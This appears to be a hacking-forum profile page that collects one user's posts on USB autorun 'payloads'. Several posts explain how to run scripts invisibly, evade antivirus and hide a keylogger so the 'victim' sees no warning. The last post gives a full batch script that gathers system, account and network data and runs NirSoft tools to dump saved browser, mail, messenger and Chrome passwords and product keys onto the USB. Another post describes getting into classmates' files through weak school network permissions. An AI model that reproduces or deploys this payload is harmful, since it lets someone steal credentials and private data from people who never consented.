Jump to content

Tox1k

Active Members
  • Posts

    16
  • Joined

  • Last visited

Posts posted by Tox1k

  1. Unfortunately it didnt even register the device being inserted :(

    Open to next suggestion

    Did you try the second part? There is a tool for almost every usb.

  2. Well, he did say he wanted to be a security professional, not a web designer. Therefore C would be ideal. While Java is what the internet runs on, C is multi-platform, lower-level, and more versatile for a security professional.

    Many of the concepts of Javascript apply to many different languages, and I see no reason to skip it just to learn C/C++.

    That's like saying learn spanish to learn latin, then you can expand to french. You'd want to learn latin first, because both spanish and french are romantic languages based off of latin. Java and C#/C++ are based off of C. Java does have plenty of nasty habits that will not work in C++/C# which are more likely what he would be using as a security professional, be it network or software. The fundamentals of C will apply to Java or C++, but the most of fundamentals of Java will most likely not apply to the fundamentals of C++. Java is not the ideal starting language, simply for those reasons. You can do it, but it will make expanding more difficult.

    However, you're not going to learn anything if you're not interested, so pick whichever one is relevant to your interests.

  3. So how come Pyblade 3.0 doesn't show me IE Logins/PWs even though it's on 1? =/

    You need to go to nirsofter's site and download the latest files in there, IEPassview and FireFoxPassView and a few others. All the files in there are probably still from when XP was in it's middle stage.

  4. First, you don't need u3 drives to use the u3 features, so if you're spending a lot of money on u3 feel free to check out my tutthat should be a topic or two below this one. A good starting point is gonzor's payload, search for it on the fourm. You'll need to update the programs, which can be gotten from nirsoft or downloaded in this pack. You'll want to include the "invisibility cloak.vbs" which will let your batch file run invisibly without a window. Other than that, feel free to make your own.

  5. There's nothing really that exists that will output in c/c++, the only good way requires two prerequisites: knowing assembly and being able to use ollybdg/some other debugger (but ollydbg shows APIs). Then, use w32dasm to save the file in assembly, and use ollydbg to translate it. It's kinda wierd to explain, but it makes sense when you do it. The few decompilers out there will produce rubbish code, which you will need to know assembly to translate into c++ anyways.

    However, since you will probably learn assembly best after you already know a higher level language, you might want to stick to textbooks/open source stuff. There are equivalent programs if you are using linux.

  6. You could try this to get a u3 like feel.

    Then, write a program in c++ or the language of your choice that opens the page. You'll need the element you want to input into; use whatever command you need to input it.

    c++ style:

        HINTERNET hInternet, hFile;
        DWORD rSize;
        hInternet = InternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
        hFile = InternetOpenUrlA(hInternet, "http://website.net", NULL, 0, INTERNET_FLAG_RELOAD, 0);
    

    then use the QWebElement class to fill out the form.

    Make the autorun.inf open the application, then put them both in an Iso, mount it, and you can use any usb you want for cheap.

  7. Try using the Open command instead. Also, is 123.bat in the root directory of the iso?

    You could try using Action=Start 123.bat in addition to open if the computer has autorun disabled.

  8. If he's doing what I think, then I did the same thing in 7th grade and could access anyone's info.

    Our school had permissions set up, but there were some flaws. For some reason I could go into the network, and what was called "\school\VirtualLocker\Student\" and use active directory to search for someone's asb number, then find the folder with the ASB number and that was their documents. Long story short, one of my friends saw me doing it and spread the knowledge around, so I went up going to the IT and helping them fix it.

    Check your network permissions for profiles folders, that's the most common and every school I've gone to has had some error I can exploit. My suggestion would be locking access to every network except their own profile and the classes they are in.

  9. Things you'll need:

    UFDUtility 3.2.3.0

    MagicISO or other iso maker

    A usb.

    1) Create the iso with the software of your choice. MagicISO free has a 300 mb limit, but you should be fine. If not, download a different program.

    2) Open your files in MagicIso and add them to the top right window.

    3) Find the save button and convert to iso.

    4) Plug in your USB, open UFDUtility

    5) If UFDUtility says "plugin not found", look at the bottom for the alternate solution. However, it should work for most non-u3 USBs.

    6) Click "Autorun Manager" (it looks like an open cd tray).

    7) At the bottom, look at "ISO file". Choose a file, then click "Burn".

    8) Eject your USB, and you should have a CD partition.

    9) To remove, simply go back to "Autorun Manager" and click "Restore Default Setting"

    If UFD didn't work:

    You'll need:

    USBDeview

    1) Open USBDeview, find your usb's VID and PID.

    2) On this page, search for the VID and PIDs.

    3) In the last column, there may be a utility. If there is, go to this page and search for the name.

    4) Google translate may help, as it's in Russian, but works.

    Downloads: 600

    Replies: 0

    sad.gif

  10. No, it is picked up by AV's a lot. However, I've been recently messing around with what I'll call "GhostPad" for now, and I'm making one that doesn't get picked up by most AVs, so it's undetectable, and is just to recover info from computers, no PWdump because it's detected by most AVs.

    GhostPad. If you want it truely undetectable, IE your victim won't get any warnings no matter what, delete everything from nirsoft (chromepass, iehv, iepv, mailpv, mspass, produkey).

    Yeah, but this stuff is mainly dead. What might interest the OP is this if you throw on a command line switch, then you can have your keylogger write and hide in a "ghosted" folder.

    Also, use this in a .vbs file and open it with a batch file referencing your start, and it'll run without a window.

    CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

    Also, making something similar to USB 3.0 (so AVs can't delete files):

    Download, make a CD partition, add your ISO. Make an ISO with MagicISO or some other software.

    :P What I had planned was a Swiss Army Knife, includes ByteSpy, Cain, Cheat Engine, md5 Hash Changer, IP Changer, PortBlocker, Mac Address Changer, Trainer Maker, UDP-Unicorn, WireShark, Panther, smsniff, LanSchool Crasher, VirtualBox, and uTorrent and that with the payload was all under 150 mb.

    batch file for payload:

    @echo off

    :: Thanks to GuidoZ for the template idea.

    :: I don't know who originally made this forensics, but it has been upgraded over time by me.

    :: Setting Log File Location

    SET logdir="%1\logs\%computername%"

    IF NOT EXIST %1\logs\%computername% (

    MD %1\logs\%computername%

    )

    :: Adding an ignore for your own computer

    IF EXIST "%systemroot%\safe.dat" goto End

    IF NOT EXIST "%systemroot%\safe.dat" goto INFO

    :INFO

    ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt

    ECHO +-----------------------------------------+ >> %1\logs\%computername%\info.txt

    ECHO + + >> %1\logs\%computername%\info.txt

    ECHO + yyy_not's Payload / Swiss Army Knife + >> %1\logs\%computername%\info.txt

    ECHO + + >> %1\logs\%computername%\info.txt

    ECHO +-----------------------------------------+ >> %1\logs\%computername%\info.txt

    ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt

    ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt

    ECHO + http://tox1kmods.webs.com + >> %1\logs\%computername%\info.txt

    ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt

    ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt

    ECHO [Time Started: %date% %time%] >> %1\logs\%computername%\info.txt

    ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt

    goto LOCALACCTS

    :LOCALACCTS

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt

    ECHO + [Local User Accounts] +>> %1\logs\%computername%\localaccts-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt

    ECHO [sTARTED: %date% %time%] >> %1\logs\%computername%\localaccts-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt

    echo Local User Accounts: >>%1\logs\%computername%\localaccts-%computername%.txt

    net users >> %1\logs\%computername%\localaccts-%computername%.txt

    echo Currently Logged on Users: >>%1\logs\%computername%\localaccts-%computername%.txt

    psloggedon /accepteula >> %1\logs\%computername%\localaccts-%computername%.txt

    echo Local Groups: >>%1\logs\%computername%\localaccts-%computername%.txt

    net localgroup >> %1\logs\%computername%\localaccts-%computername%.txt

    echo Members of the local administrators group: >>%1\logs\%computername%\localaccts-%computername%.txt

    net localgroup administrators >> %1\logs\%computername%\localaccts-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt

    ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\localaccts-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt

    echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\localaccts-%computername%.txt

    goto LOCALNET

    :LOCALNET

    ECHO +-----------------------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt

    ECHO + [Network Info, ARP Tables, Open Connections, Firewall Status] +>> %1\logs\%computername%\localnet-%computername%.txt

    ECHO +-----------------------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt

    ECHO [sTARTED: %date% %time%] >> %1\logs\%computername%\localnet-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt

    echo Current IP Configuration: >> %1\logs\%computername%\localnet-%computername%.txt

    ipconfig /all >> %1\logs\%computername%\localnet-%computername%.txt

    echo Contents of the DNS Cache: >> %1\logs\%computername%\localnet-%computername%.txt

    ipconfig /displaydns >> %1\logs\%computername%\localnet-%computername%.txt

    echo ARP Table Contents: >> %1\logs\%computername%\localnet-%computername%.txt

    arp -a >> %1\logs\%computername%\localnet-%computername%.txt

    echo Status of active TCP and UDP connections: >> %1\logs\%computername%\localnet-%computername%.txt

    netstat -ano >> %1\logs\%computername%\localnet-%computername%.txt

    echo Routing Table: >> %1\logs\%computername%\localnet-%computername%.txt

    route print >> %1\logs\%computername%\localnet-%computername%.txt

    echo Hosts file contents: >> %1\logs\%computername%\localnet-%computername%.txt

    type %systemroot%\system32\drivers\etc\hosts >> %1\logs\%computername%\localnet-%computername%.txt

    echo Windows Firewall Configuration: >> %1\logs\%computername%\localnet-%computername%.txt

    netsh firewall show state >> %1\logs\%computername%\localnet-%computername%.txt

    echo Windows Firewall service state: >> %1\logs\%computername%\localnet-%computername%.txt

    netsh firewall show service >> %1\logs\%computername%\localnet-%computername%.txt

    echo Mapped Network Drives: >> %1\logs\%computername%\localnet-%computername%.txt

    net use >> %1\logs\%computername%\localnet-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt

    ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\localnet-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt

    echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\localnet-%computername%.txt

    goto SYSINFO

    :SYSINFO

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO + [installed Software, Running Processes] + >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO [sTARTED: %date% %time%] >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    echo Machine Information: >> %1\logs\%computername%\sysinfo-%computername%.txt

    psinfo /accepteula /h /s >> %1\logs\%computername%\sysinfo-%computername%.txt

    echo Running Processes: >> %1\logs\%computername%\sysinfo-%computername%.txt

    pslist -t /accepteula >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO + [services from Running Processes] + >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    echo Services running from each process: >> %1\logs\%computername%\sysinfo-%computername%.txt

    tasklist /svc >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO + [state of Services on Machine] + >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    echo Service states: >> %1\logs\%computername%\sysinfo-%computername%.txt

    sc query state= all >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO + [installed Printers] + >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    echo Printer Information: >> %1\logs\%computername%\sysinfo-%computername%.txt

    cscript %WINDIR%\System32\Prnmngr.vbs -l >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO + [Group Policies] + >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    echo Effective group policies: >> %1\logs\%computername%\sysinfo-%computername%.txt

    gpresult -r -z >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO + [Drivers in use] + >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    echo Drivers currently in use: >> %1\logs\%computername%\sysinfo-%computername%.txt

    driverquery >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO + [system Variables] + >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    echo System Variables: >> %1\logs\%computername%\sysinfo-%computername%.txt

    set >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO + [startup Run RunOnce] + >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    REM Export the Run and RunOnce Values inside HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER

    reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Run %1\logs\%computername%\HKLMrun.reg -y >> %1\logs\%computername%\sysinfo-%computername%.txt

    reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Runonce %1\logs\%computername%\HKLMrunonce.reg -y >> %1\logs\%computername%\sysinfo-%computername%.txt

    reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run %1\logs\%computername%\HKCUrun.reg -y >> %1\logs\%computername%\sysinfo-%computername%.txt

    reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Runonce %1\logs\%computername%\HKCUrunonce.reg -y >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\sysinfo-%computername%.txt

    goto ERRORLOG

    :ERRORLOG

    ECHO +---------------------------------------+ >> %1\logs\%computername%\syslog-%computername%.txt

    ECHO + [system Error Log] +>> %1\logs\%computername%\syslog-%computername%.txt

    ECHO +---------------------------------------+ >> %1\logs\%computername%\syslog-%computername%.txt

    ECHO. >> %1\logs\%computername%\syslog-%computername%.txt

    ECHO This will only work in Windows Vista/XP >> %1\logs\%computername%\syslog-%computername%.txt

    ECHO. >> %1\logs\%computername%\syslog-%computername%.txt

    REM Grab Sytem Error Log for Review (Error ONLY)

    cscript %WINDIR%\System32\eventquery.vbs /fi "Type eq Error" /V /L System >> %1\logs\%computername%\syslog-%computername%.txt

    REM Grab Application Error Logs for Review

    cscript %WINDIR%\System32\eventquery.vbs /fi "Type eq Error" /V /L Application >> %1\logs\%computername%\syslog-%computername%.txt

    goto PORT

    :PORT

    ECHO +----------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt

    ECHO + [Port Scan] + >> %1\logs\%computername%\netlog-info-%computername%.txt

    ECHO +----------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt

    ECHO [sTARTED: %date% %time%] >> %1\logs\%computername%\netlog-info-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt

    START .\portqry -local -l %1\logs\%computername%\netlog-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt

    ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\netlog-info-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt

    goto MD5

    :MD5

    ECHO +----------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt

    ECHO + [MD5 Hashes of the system directory] +>> %1\logs\%computername%\osmd5-%computername%.txt

    ECHO +----------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt

    ECHO [sTARTED: %date% %time%] >> %1\logs\%computername%\osmd5-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt

    echo %date% %time% >> %1\logs\%computername%\osmd5-%computername%.txt

    md5sums %systemroot% >> %1\logs\%computername%\osmd5-%computername%.txt

    md5sums %systemroot%\system >> %1\logs\%computername%\osmd5-%computername%.txt

    md5sums %systemroot%\system32 >> %1\logs\%computername%\osmd5-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt

    ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\osmd5-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt

    echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\osmd5-%computername%.txt

    goto MDINFO

    :MDINFO

    IF NOT EXIST %1\logs\%computername%\userinfo (

    MD %1\logs\%computername%\userinfo\

    )

    goto MDPASS

    :MDPASS

    IF NOT EXIST %1\logs\%computername%\userinfo\pass (

    MD %1\logs\%computername%\userinfo\pass\

    )

    goto IEFIREHIST

    :IEFIREHIST

    :INFO

    ECHO +--------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO + [information Recovery] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO +--------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO [sTARTED: %date% %time%] >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\urllog-%computername%.txt

    ECHO + [Dumping IE and FireFox history] +>> %1\logs\%computername%\userinfo\urllog-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\urllog-%computername%.txt

    START .\FirePassword.exe >> %1\logs\%computername%\userinfo\pass\firepass-%computername%.txt

    START cscript .\IE_FireFox.vbs >> %1\logs\%computername%\userinfo\firehistorylog-%computername%.txt

    START .\iehv.exe /stext %1\logs\%computername%\userinfo\IElog-%computername%.txt

    ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO Passwords stored in .\pass\firepass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO Passwords stored in .\pass\firehistorylog-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO Passwords stored in .\pass\IElog-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO +--------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO + [Dump Mail PW] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO +--------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO Passwords stored in .\pass\mailpass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    START .\mailpv.exe /stext "%1\logs\%computername%\userinfo\pass\mailpass-%computername%.txt" /sort "Application" /sort "Name"

    ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO + [Dump IE PW] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO Passwords stored in .\pass\IEpass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    START .\iepv.exe /stext "%1\logs\%computername%\userinfo\pass\IEpass-%computername%.txt" /sort "Entry Name"

    ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO + [Dump Messanger PW] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO Passwords will be dumped in .\pass\MSpass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    START .\mspass.exe /stext %1\logs\%computername%\userinfo\pass\MSpass-%computername%.txt

    ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO + [Dump Product Keys] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    START .\PRODUKEY.exe /nosavereg /stext "%1\logs\%computername%\userinfo\productkeys-%computername%.txt" /remote %computername% >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO + [Dumping Chrome Passwords] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO Passwords stored in .\pass\chromepass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    START .\ChromePass.exe /stext %1\logs\%computername%\userinfo\pass\chromepass-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    goto END

    :END

    ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt

    ECHO [Time Completed: %date% %time%] >> %1\logs\%computername%\info.txt

    ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt

    START EXPLORER.EXE

    exit

×
×
  • Create New...